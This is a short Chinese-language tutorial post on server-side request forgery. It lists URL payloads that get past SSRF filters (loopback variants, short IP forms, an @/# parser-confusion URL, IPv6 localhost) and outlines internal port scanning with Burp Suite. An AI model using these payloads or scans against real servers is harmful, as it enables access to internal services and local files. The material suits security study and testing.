ssrf绕过
当涉及到SSRF(服务器端请求伪造)时,可以使用以下5种有效负载绕过防御:
1)使用CIDR绕过SSRF:
http://127.127.127.127
http://127.0.0.0
2)使用稀有地址绕行:
http://127.1
http://0
3)使用技巧组合绕过:
http://1.1.1.1&@2.2.2.2# @3.3.3.3/
urllib: 3.3.3.3
4)绕过弱解析器:
http://127.1.1.1:80\@127.2.2.2:80/
5)用[::]绕过localhost:
http://[::]:80/
http://0000::1:80/
让我们提醒自己什么是SSRF漏洞,以及我们可以如何处理这些漏洞。通常,SSRF允许我们:
- 在远程服务器上运行的回送接口上的访问服务
- 扫描内部网络可能与发现的服务进行交互
- 使用file://协议处理程序读取服务器上的本地文件
- 横向移动/旋转进入内部环境
如何找到SSRF?当目标Web应用程序允许我们访问外部资源时,例如从外部URL加载的配置文件图像(在第三方网站上运行),我们可以尝试加载易受攻击的Web应用程序可访问的内部资源。例如:
- 我们发现以下URL有效:
https://example.com:8000/page?user=&link=https://127.0.0.1:8000
- 然后,我们可以尝试不同的端口来运行入侵者攻击(Burp Suite),从而有效地对主机进行端口扫描
- 我们还可以尝试扫描专用IP(例如192.168.xx)并发现内部网络中存在的IP
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)